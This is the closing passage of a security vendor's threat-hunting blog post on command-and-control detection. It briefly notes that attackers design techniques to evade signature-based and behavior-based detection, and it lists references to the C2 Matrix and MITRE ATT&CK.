This tendency creates a real challenge for detection. Adversaries are well aware of both signature-based and behavior-based (fileless) methods of detection and continuously design new TTPs to bypass and evade them.

Happy hunting!

References

- The C2 Matrix
https://howto.thec2matrix.com/

- MITRE ATT&CK (Command and Control)
https://attack.mitre.org/tactics/TA0011/

Newsletter

Keep up to date with the latest cybersecurity news and developments.

By subscribing, I understand and agree that my personal data will be collected and processed according to the Privacy and Cookies Policy

Cloud Architecture
Cloud Architecture
445 S. Figueroa Street
Los Angeles, CA 90071
Google Maps
Contact us by filling out the form.
Try Resecurity products today with a free trial